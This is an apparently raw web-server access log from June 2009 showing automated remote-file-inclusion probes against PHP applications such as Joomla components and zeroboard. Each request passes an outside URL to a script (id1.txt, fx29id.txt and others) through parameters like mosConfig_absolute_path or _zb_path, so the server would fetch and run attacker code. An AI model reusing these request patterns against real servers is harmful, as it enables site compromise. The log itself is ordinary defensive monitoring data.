124.0.145.1 - - [26/Jun/2009:12:11:09 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.0.145.1 - - [26/Jun/2009:12:11:09 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
124.0.145.1 - - [26/Jun/2009:12:11:14 -0500] "GET /logs/access_log.1240444800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.0.145.1 - - [26/Jun/2009:12:11:14 -0500] "GET /logs/access_log.1240531200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.0.145.1 - - [26/Jun/2009:12:12:17 -0500] "GET /logs/access_log.1240272000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:12:12:20 -0500] "GET /logs/access_log.1228608000///vwar/backup/errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
91.142.209.134 - - [26/Jun/2009:12:15:05 -0500] "GET /logs//pollphp/db//booth.php?include_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:12:15:05 -0500] "GET //pollphp/db//booth.php?include_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:12:15:10 -0500] "GET //pollphp/db//booth.php?include_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:12:15:10 -0500] "GET /logs//pollphp/db//booth.php?include_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
91.121.137.51 - - [26/Jun/2009:12:15:15 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
91.121.137.51 - - [26/Jun/2009:12:15:15 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
75.125.198.130 - - [26/Jun/2009:12:16:33 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
75.125.198.130 - - [26/Jun/2009:12:16:33 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
124.0.139.129 - - [26/Jun/2009:12:17:14 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:12:17:14 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:12:17:23 -0500] "GET /logs/access_log.1239753600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:12:17:23 -0500] "GET /logs/access_log.1236211200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
91.121.137.51 - - [26/Jun/2009:12:17:44 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
91.121.137.51 - - [26/Jun/2009:12:17:44 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
69.10.159.229 - - [26/Jun/2009:12:19:38 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:12:19:40 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:12:19:53 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:12:19:53 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:12:19:53 -0500] "GET /logs/access_log.1239494400/joomla/index.php?option=com_restaurante&task=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:12:19:56 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:12:19:56 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:12:19:56 -0500] "GET /logs/access_log.1239494400/joomla/index.php?option=com_restaurante&task=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
201.28.116.226 - - [26/Jun/2009:12:20:39 -0500] "GET /theme.php?THEME_DIR=http://www.jujumar.com.br/admin/fckeditor/idv6.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
201.28.116.226 - - [26/Jun/2009:12:20:39 -0500] "GET /logs/theme.php?THEME_DIR=http://www.jujumar.com.br/admin/fckeditor/idv6.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
195.34.78.110 - - [26/Jun/2009:12:21:12 -0500] "GET /logs/shop/main.php?_skin_dir=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:12:21:12 -0500] "GET /shop/main.php?_skin_dir=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:12:21:12 -0500] "GET /logs/access_log.1234483200/shop/main.php?_skin_dir=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:12:21:27 -0500] "GET /logs/access_log.1239062400/shop/main.php?_skin_dir=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.55.106.228 - - [26/Jun/2009:12:21:56 -0500] "GET /logs/access_log.1229472000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.28.116.226 - - [26/Jun/2009:12:22:00 -0500] "GET /logs/theme.php?THEME_DIR=http://www.jujumar.com.br/admin/fckeditor/idv6.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
201.28.116.226 - - [26/Jun/2009:12:22:06 -0500] "GET /theme.php?THEME_DIR=http://www.jujumar.com.br/admin/fckeditor/idv6.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
64.40.150.211 - - [26/Jun/2009:12:23:09 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
64.40.150.211 - - [26/Jun/2009:12:23:09 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.40.150.211 - - [26/Jun/2009:12:23:09 -0500] "GET //skin/zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:12:23:20 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:12:23:20 -0500] "GET /?sourcedir=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:12:23:25 -0500] "GET /logs/?sourcedir=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 200 194785 "-""Mozilla/5.0"
64.40.150.211 - - [26/Jun/2009:12:23:25 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
80.74.147.180 - - [26/Jun/2009:12:24:43 -0500] "GET /logs/config.php?path_to_root=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
80.74.147.180 - - [26/Jun/2009:12:24:43 -0500] "GET /logs/access_log.1238889600/config.php?path_to_root=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
80.74.147.180 - - [26/Jun/2009:12:24:43 -0500] "GET /config.php?path_to_root=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
200.54.154.10 - - [26/Jun/2009:12:26:38 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.54.154.10 - - [26/Jun/2009:12:26:38 -0500] "GET //skin/zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
200.54.154.10 - - [26/Jun/2009:12:26:39 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
80.74.147.180 - - [26/Jun/2009:12:28:15 -0500] "GET /logs/access_log.1238889600/config.php?path_to_root=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
80.74.147.180 - - [26/Jun/2009:12:28:15 -0500] "GET /logs/config.php?path_to_root=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
80.74.147.180 - - [26/Jun/2009:12:28:15 -0500] "GET /config.php?path_to_root=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
24.39.162.98 - - [26/Jun/2009:12:33:23 -0500] "GET //skin/zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
24.39.162.98 - - [26/Jun/2009:12:33:23 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
24.39.162.98 - - [26/Jun/2009:12:33:23 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
82.136.20.14 - - [26/Jun/2009:12:33:37 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
82.136.20.14 - - [26/Jun/2009:12:33:37 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
24.39.162.98 - - [26/Jun/2009:12:34:13 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:12:43:16 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:12:43:16 -0500] "GET /logs/access_log.1239753600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:12:43:16 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:12:45:14 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:12:46:46 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:12:46:46 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:12:46:46 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:12:46:51 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:12:46:58 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:12:46:58 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:12:46:58 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:12:46:58 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:12:47:11 -0500] "GET /module.php?mod=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:12:47:11 -0500] "GET /logs/access_log.1238371200/module.php?mod=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:12:47:11 -0500] "GET /logs/module.php?mod=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.55.106.192 - - [26/Jun/2009:12:47:24 -0500] "GET /logs/access_log.1152489600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.206.120.187 - - [26/Jun/2009:12:48:25 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:12:48:25 -0500] "GET /logs/access_log.1238025600///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:12:48:27 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 194791 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:12:48:57 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:12:48:57 -0500] "GET /?custompluginfile[]=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:12:49:03 -0500] "GET /logs/access_log.1237507200///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:12:49:04 -0500] "GET /logs/?custompluginfile[]=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 200 194785 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:12:50:47 -0500] "GET /logs//error.php?DOCUMENT_ROOT=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:12:50:47 -0500] "GET /logs/access_log.1239926400//error.php?DOCUMENT_ROOT=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:12:50:47 -0500] "GET //error.php?DOCUMENT_ROOT=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.146.47.98 - - [26/Jun/2009:12:53:51 -0500] "GET /logs/send_reminders.php?includedir=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
62.146.47.98 - - [26/Jun/2009:12:53:51 -0500] "GET /send_reminders.php?includedir=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.121.137.51 - - [26/Jun/2009:12:54:13 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
91.121.137.51 - - [26/Jun/2009:12:54:13 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
91.121.137.51 - - [26/Jun/2009:12:54:19 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
91.121.137.51 - - [26/Jun/2009:12:54:19 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
87.230.22.39 - - [26/Jun/2009:12:56:07 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
87.230.22.39 - - [26/Jun/2009:12:56:07 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
87.230.22.39 - - [26/Jun/2009:12:56:07 -0500] "GET /logs/access_log.1239753600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
87.230.22.39 - - [26/Jun/2009:12:56:08 -0500] "GET /logs/access_log.1234828800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
65.55.106.184 - - [26/Jun/2009:12:58:55 -0500] "GET /logs/access_log.1224633600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.140.23.185 - - [26/Jun/2009:13:00:33 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
62.140.23.185 - - [26/Jun/2009:13:00:33 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
82.194.87.219 - - [26/Jun/2009:13:03:10 -0500] "GET /logs////administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 355 "-""libwww-perl/5.822"
65.55.106.107 - - [26/Jun/2009:13:07:25 -0500] "GET /logs/access_log.1158624000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.194.87.219 - - [26/Jun/2009:13:07:40 -0500] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 354 "-""libwww-perl/5.822"
82.194.87.219 - - [26/Jun/2009:13:08:44 -0500] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 354 "-""libwww-perl/5.822"
124.0.139.129 - - [26/Jun/2009:13:08:44 -0500] "GET /?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:08:45 -0500] "GET /logs/access_log.1233705600/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:08:47 -0500] "GET /logs/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 200 194785 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:00 -0500] "GET /logs/access_log.1236211200/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:00 -0500] "GET /logs/access_log.1233878400/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:01 -0500] "GET /logs/access_log.1227571200/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:08 -0500] "GET /logs/access_log.1238889600/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:08 -0500] "GET /logs/access_log.1240444800/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:08 -0500] "GET /logs/access_log.1238198400/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:08 -0500] "GET /logs/access_log.1232582400/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:08 -0500] "GET /logs/access_log.1234137600/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:23 -0500] "GET /logs/access_log.1237680000/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:23 -0500] "GET /logs/access_log.1229990400/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:23 -0500] "GET /logs/access_log.1239062400/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:23 -0500] "GET /logs/access_log.1235260800/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:23 -0500] "GET /logs/access_log.1240617600/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:23 -0500] "GET /logs/access_log.1233014400/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:23 -0500] "GET /logs/access_log.1233792000/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:23 -0500] "GET /logs/access_log.1238803200/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:23 -0500] "GET /logs/access_log.1235088000/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:24 -0500] "GET /logs/access_log.1239408000/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:37 -0500] "GET /logs/access_log.1235952000/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:37 -0500] "GET /logs/access_log.1240531200/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:37 -0500] "GET /logs/access_log.1229731200/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:37 -0500] "GET /logs/access_log.1240185600/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:37 -0500] "GET /logs/access_log.1235692800/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:37 -0500] "GET /logs/access_log.1232928000/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:37 -0500] "GET /logs/access_log.1234051200/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:37 -0500] "GET /logs/access_log.1240012800/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:37 -0500] "GET /logs/access_log.1232496000/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:54 -0500] "GET /logs/access_log.1238025600/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
